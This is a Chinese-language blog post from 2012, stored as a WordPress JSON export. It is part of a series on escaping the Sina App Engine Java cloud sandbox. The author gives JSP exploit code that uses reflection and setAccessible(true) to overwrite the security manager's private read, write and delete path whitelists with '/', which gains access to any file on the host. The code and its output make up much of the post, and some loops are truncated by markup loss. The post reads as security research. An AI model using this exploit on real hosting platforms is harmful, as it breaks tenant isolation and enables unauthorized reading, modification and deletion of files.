{"id":451,"date":"2012-08-20T22:13:37","date_gmt":"2012-08-20T14:13:37","guid":{"rendered":"http:\/\/inbreak.net\/?p=451"},"modified":"2012-08-20T22:13:37","modified_gmt":"2012-08-20T14:13:37","slug":"sae%e4%ba%91%e6%9c%8d%e5%8a%a1%e5%ae%89%e5%85%a8%e6%b2%99%e7%ae%b1%e7%bb%95%e8%bf%875%e5%bc%ba%e5%88%b6%e4%bf%ae%e6%94%b9class%e7%a7%81%e6%9c%89%e6%9d%83%e9%99%90","status":"publish","type":"post","link":"https:\/\/www.inbreak.net\/archives\/451.html","title":{"rendered":"SAE\u4e91\u670d\u52a1\u5b89\u5168\u6c99\u7bb1\u7ed5\u8fc75(\u5f3a\u5236\u4fee\u6539class\u79c1\u6709\u6743\u9650)"},"content":{"rendered":"
By \u7a7a\u865a\u6d6a\u5b50\u5fc3 http:\/\/inbreak.net<\/p>\n
\u6458\u8981<\/strong><\/p>\n \u4f5c\u8005\u5728\u6587\u7ae0\u300aSAE\u4e91\u670d\u52a1\u5b89\u5168\u6c99\u7bb1\u7ed5\u8fc74(\u7ed5\u8fc7\u6587\u4ef6\u6743\u9650\u9632\u5fa1)\u300bhttp:\/\/inbreak.net\/archives\/436 \u63d0\u5230\u8fc7\u4e00\u4e2a\u91cd\u8981\u7684\u7c7b\uff0c\u662f\u7528\u6765SAE\u505a\u5b89\u5168\u8ba4\u8bc1\u7684\uff0c\u5b83\u53eb\u505a\u201ccom.sina.sae.security.SaeSecurityManager\u201d\uff0c\u8fd9\u4e2a\u7c7b\u63d0\u4f9b\u51e0\u4e2a\u9a8c\u8bc1\u65b9\u6cd5\uff0c\u672c\u6b21BY PASS\uff0c\u4f5c\u8005\u53c8\u628a\u76ee\u6807\u653e\u5728\u8fd9\u4e2a\u7c7b\u4e0a\u3002<\/p>\n \u6b63\u6587<\/strong><\/p>\n \u4e0a\u4e00\u7bc7\u6587\u7ae0\u5df2\u7ecf\u63d0\u5230\uff0c\u5982\u679c\u60f3\u8fd9\u4e2a\u7c7b\u4f5c\u4e3a\u6c99\u76d2\u5b89\u5168\u8ba4\u8bc1\u7684\u57fa\u7840\u7c7b\uff0c\u5c31\u5fc5\u987b\u7ee7\u627fjava.lang.SecurityManager\uff0c\u5e76\u4e14\u5f53\u524d\u8fd0\u884c\u73af\u5883\u4e2d\uff0c\u53ef\u4ee5\u67e5\u5230\u5f53\u524d\u7684SecurityManager\u5bf9\u8c61\uff0c\u4ee5\u53ca\u5177\u4f53\u7684\u7c7b\u540d\u7b49\u3002\u53ef\u4ee5\u6267\u884c System \u7c7b\u7684\u9759\u6001\u65b9\u6cd5 getSecurityManager( )\uff0c\u5982\u679c\u5728\u8fd0\u884c Java \u7a0b\u5e8f\u65f6\u4f7f\u7528-D java.security.manager \u547d\u4ee4\u884c\u9009\u9879\u6307\u5b9a\u4e86\u4f7f\u7528\u9ed8\u8ba4\u7684\u5b89\u5168\u7ba1\u7406\u5668\uff0c\u6216\u81ea\u5df1\u5b9a\u4e49\u7684\u5b89\u5168\u7ba1\u7406\u5668\uff0c\u5219\u5c06\u8fd4\u56de\u8be5\u5b89\u5168\u7ba1\u7406\u5668\u3002<\/p>\n \u63a2\u6d4bsandbox\u73af\u5883<\/strong><\/p>\n <\/a><\/p>\n \u4ece\u9875\u9762\u8fd4\u56de\u4fe1\u606f\u4e2d\uff0c\u53ef\u4ee5\u770b\u5230\u8fd9\u4e2a\u7c7b\u7684\u5730\u5740\u548c\u7c7b\u540d\uff0c\u786e\u5b9e\u662f\u63d0\u793a\u6211\u4eec\u6c99\u76d2\u5b89\u5168\u9519\u8bef\u7684\u90a3\u4e2a\u7c7b\u3002\u8fd9\u6837\u5c31\u53ef\u4ee5\u5199\u6bb5\u4ee3\u7801\uff0c\u7528\u4e8e\u67e5\u770b\u7c7b\u7684\u5c5e\u6027\u3002 \u8fd9\u6bb5\u4ee3\u7801\uff0c\u53ef\u4ee5\u904d\u5386\u51fa\u4e00\u4e2a\u5bf9\u8c61\u7684\u6240\u6709\u5c5e\u6027\uff0c\u5305\u62ec\u79c1\u6709\u7684\u548cpublic\u7684\u3002<\/p>\n \u6253\u5f00\u9875\u9762\u540e\uff0c\u770b\u5230\u6267\u884c\u7ed3\u679c\uff1a<\/p>\n <\/a><\/p>\n \u6211\u4eec\u770b\u5230\u4e86\u4ee5\u4e0b\u5c5e\u6027\u5217\u8868\uff1a<\/p>\n \u8fd9\u51e0\u4e2a\u5c5e\u6027\uff0c\u901a\u8fc7\u82f1\u6587\u5355\u8bcd\u7684\u4e2d\u6587\u7ffb\u8bd1\uff0c\u53ef\u4ee5\u770b\u5230\u7ed3\u679c\u3002<\/p>\n String[] rwPath — \u8fd9\u4e2a\u662f\u4e2a\u8def\u5f84\u5217\u8868\uff0c\u53ef\u80fd\u4ee3\u8868\u6587\u4ef6\u5199\u6743\u9650\u7684\u8def\u5f84\uff0c\u5982\u679c\u731c\u5f97\u4e0d\u9519\uff0c\u5f88\u53ef\u80fd\u5c31\u662f\u6211web\u76ee\u5f55\u7684\u8def\u5f84\u3002 \u6709\u8fd9\u51e0\u4e2a\u5c5e\u6027\uff0c\u5c31\u8db3\u591f\u4e86\u8bf4\u660e\u95ee\u9898\u4e86\uff0cSAE\u7684\u76f8\u5173\u4ee3\u7801\uff0c\u5fc5\u7136\u4f1a\u6839\u636e\u8fd9\u4e09\u4e2a\u8def\u5f84\uff0c\u53bb\u5224\u65ad\u6587\u4ef6\u7684\u8bfb\u5199\u6743\u9650\u3002<\/p>\n \u63d0\u6743<\/strong><\/p>\n \u8fd9\u4e2a\u5c5e\u6027\u80fd\u4e0d\u80fd\u6539\u5462\uff1f\u5982\u679c\u5b83\u4eec\u662fpublic\u7684\uff0c\u5c31\u53ef\u4ee5\u76f4\u63a5\u6539\u6389\u4e86\u3002<\/p>\n \u5199\u4ee3\u7801\u4fee\u6539\u8fd9\u51e0\u4e2a\u8def\u5f84\u8bd5\u8bd5\uff1a<\/p>\n \u9875\u9762\u663e\u793a\u4e86<\/p>\n <\/a><\/p>\n \u628a\u8fd9\u6bb5\u91cd\u8981\u7684\u4fe1\u606f\u590d\u5236\u51fa\u6765<\/p>\n \u8fd9\u6bb5\u9519\u8bef\u7684\u610f\u601d\u662f\uff0c\u4e0d\u80fd\u8bbf\u95ee\u8fd9\u4e2a\u201cprivate\u201d\u7684\u5b57\u6bb5\uff0c\u8fd9\u4e2a\u5b57\u6bb5\u4e0d\u80fd\u76f4\u63a5\u6539\u3002\u4f46\u662f\u8fd9\u5e76\u4e0d\u662f\u65e0\u89e3\u7684\uff0c\u5982\u679c\u5f53\u524d\u7684\u6c99\u76d2\u6743\u9650\uff0c\u521a\u597d\u5141\u8bb8\u201csuppressAccessChecks\u201d,\u662f\u53ef\u4ee5\u901a\u8fc7<\/p>\n \u6765\u5f3a\u5236\u4fee\u6539\u7c7b\u79c1\u6709\u5b57\u6bb5\u7684\u3002\u5f88\u5de7\uff0cSAE\u786e\u5b9e\u5141\u8bb8\u8fd9\u4e2a\u6743\u9650\uff0c\u5728\u7b2c\u4e00\u6b21bypass\u65f6\uff0c\u6211\u5217\u4e86\u4e00\u90e8\u5206\u6743\u9650\u5217\u8868\uff0c\u5176\u4e2d\u5c31\u5305\u62ec\u8fd9\u4e2a\u6743\u9650\u3002<\/p>\n <\/a><\/p>\n \u6240\u4ee5\uff0c\u53ea\u8981\u7b80\u7565\u7684\u4fee\u6539\u4ee3\u7801\uff0c\u5c31\u53ef\u4ee5\u5b9e\u73b0\u5f3a\u5236\u4fee\u6539\u8fd9\u4e2a\u5c5e\u6027\uff1a<\/p>\n \u8fd9\u6837\u5c31\u53ef\u4ee5\u6539\u4e86\uff0c\u8fd9\u4e2a\u9875\u9762\uff0c\u5c31\u662f\u6240\u8c13\u7684\u63d0\u6743\u9875\u9762\uff0c\u53ea\u8981\u8bbf\u95ee\u4e86\u8fd9\u4e2a\u9875\u9762\uff0c\u5f53\u524dapp\u7684\u6743\u9650\u5c31\u4f1a\u63d0\u5347\uff0c\u5141\u8bb8\u8bbf\u95ee\u6240\u6709\u6587\u4ef6\u3002<\/p>\n \u6b64\u4e4b\u524d\u8fd8\u662f\u5148\u770b\u770b\uff0c\u4e0d\u4f7f\u7528\u63d0\u6743\u8bfb\u53d6\u6587\u4ef6\u6548\u679c\uff1a<\/p>\n <\/a><\/p>\n \u8fd9\u4e2a\u6587\u4ef6\u662f\u4e0d\u80fd\u8bfb\u7684\uff0c\u4e0b\u9762\u6253\u5f00\u63d0\u6743\u7684JSP\u6587\u4ef6\uff1a<\/p>\n <\/a><\/p>\n \u8fd9\u4e2a\u6ca1\u6709\u518d\u6b21\u8fd4\u56de\u56e0\u4e3aprivate\u6240\u4ee5\u4e0d\u80fd\u4fee\u6539\u7684\u9519\u8bef\uff0c\u81f3\u4e8e\u540e\u9762\u7684\u201d Can not set static final java.util.Set field \u201d,\u662f\u56e0\u4e3a\u201d BAN_LIST_STARTSWITH\u201d,\u7684\u5b57\u6bb5\u7c7b\u578b\u4e0d\u662fString\u6570\u7ec4\uff0c\u8fd9\u4e2a\u5b57\u6bb5\u6211\u4eec\u53cd\u6b63\u4e5f\u4e0d\u53bb\u4fee\u6539\uff0c\u6240\u4ee5\u65e0\u5173\u7d27\u8981\uff0c\u91cd\u8981\u7684\u662f\u6211\u4eec\u628a\u90a3\u4e09\u4e2a\u5141\u8bb8\u5f53\u524dapp\u8bfb\u3001\u5199\u3001\u5220\u9664\u7684\u6587\u4ef6\u767d\u540d\u5355\u5217\u8868\u4fee\u6539\u4e3a\u201c\/\u201d\u4e86\uff0c\u610f\u5473\u7740\u53ef\u4ee5\u8bfb\u53d6\u5220\u9664\u4fee\u6539\u4efb\u4f55\u6587\u4ef6\u3002<\/p>\n \u4e0b\u9762\u518d\u6b21\u8bbf\u95ee\u8fd9\u4e2a\u8bfb\u53d6\u6587\u4ef6\u7684\u5730\u5740\u770b\u770b\uff1a<\/p>\n\r\n<%=System.getSecurityManager()%>\r\n<\/pre>\n
\n\u4e0b\u9762\u770b\u770b\u8fd9\u4e2a\u7c7b\u4e0b\u9762\u6709\u4ec0\u4e48\u5c5e\u6027\uff1a<\/p>\n\r\n<%@page import=\"java.io.*,java.net.*,java.lang.reflect.*\"%>\r\n<%=System.getSecurityManager() %>
\r\n<%\r\n ClassLoader cl = Thread.currentThread().getContextClassLoader();\r\n try {\r\n Class c = cl.loadClass(\"com.sina.sae.security.SaeSecurityManager\");\r\n %><%=c.toString()%><%\r\n Field[] f=c.getDeclaredFields();\r\n %><%=\"----------------------------------\"%>
<%\r\n for(int i=0;i
<%;\r\n }\r\n } catch (Exception e) {\r\n %><%=e%><%\r\n }\r\n%>\r\n<\/pre>\n\r\nString[] rwPath\r\nString[] readPath\r\nString[] deletePath\r\nBAN_LIST_STARTSWITH\r\nBAN_LIST_FULLNAME\r\n<\/pre>\n
\nString[] readPath — \u8fd9\u4e2a\u662f\u4e2a\u8def\u5f84\u5217\u8868\uff0c\u53ef\u80fd\u4ee3\u8868\u6587\u4ef6\u8bfb\u53d6\u6743\u9650\u7684\u8def\u5f84\uff0c\u5982\u679c\u731c\u5f97\u4e0d\u9519\uff0c\u5f88\u53ef\u80fd\u5c31\u662f\u6211web\u76ee\u5f55\u7684\u8def\u5f84\u3002
\nString[] deletePath — \u8fd9\u4e2a\u662f\u4e2a\u8def\u5f84\u5217\u8868\uff0c\u53ef\u80fd\u4ee3\u8868\u6587\u4ef6\u5220\u9664\u6743\u9650\u7684\u8def\u5f84\uff0c\u5982\u679c\u731c\u5f97\u4e0d\u9519\uff0c\u5f88\u53ef\u80fd\u5c31\u662f\u6211web\u76ee\u5f55\u7684\u8def\u5f84\u3002<\/p>\n\r\n<%@page import=\"java.io.*,java.net.*,java.lang.reflect.*\"%>\r\n<%\r\n SecurityManager security = System.getSecurityManager();\r\n try {\r\n Class c = System.getSecurityManager().getClass();\r\n %><%=c.toString()%><%\r\n Field[] f=c.getDeclaredFields();\r\n for(int i=0;i
<%\r\n try{ \r\n f[i].set(System.getSecurityManager(),new String[]{\"\/\"});\r\n }catch (Exception e) {\r\n %><%=e%><%\r\n }\r\n }\r\n %><%=\"----------------------------------\"%>
<%\r\n for(int i=0;i
<%;\r\n }\r\n } catch (Exception e) {\r\n %><%=e%><%\r\n }\r\n%>\r\n<%=security.toString()%>\r\n<\/pre>\n\r\njava.lang.IllegalAccessException: Class org.apache.jsp.sm_jsp can not access a member of class com.sina.sae.security.SaeSecurityManager with modifiers \"private\"class [Ljava.lang.String;|readPath\r\n<\/pre>\n
\r\nsetAccessible(true)\r\n<\/pre>\n
\r\n<%@page import=\"java.io.*,java.net.*,java.lang.reflect.*\"%>\r\n<%\r\n SecurityManager security = System.getSecurityManager();\r\n \/\/ClassLoader cl = Thread.currentThread().getContextClassLoader();\r\n try {\r\n Class c = System.getSecurityManager().getClass();\r\n %><%=c.toString()%><%\r\n \r\n Field[] f=c.getDeclaredFields();\r\n \r\n for(int i=0;i
<%\r\n try{ \r\n f[i].set(System.getSecurityManager(),new String[]{\"\/\"});\r\n }catch (Exception e) {\r\n %><%=e%><%\r\n }\r\n }\r\n %><%=\"----------------------------------\"%>
<%\r\n for(int i=0;i
<%;\r\n }\r\n } catch (Exception e) {\r\n %><%=e%><%\r\n }\r\n \r\n%>\r\n<%=security.toString()%>\r\n<\/pre>\n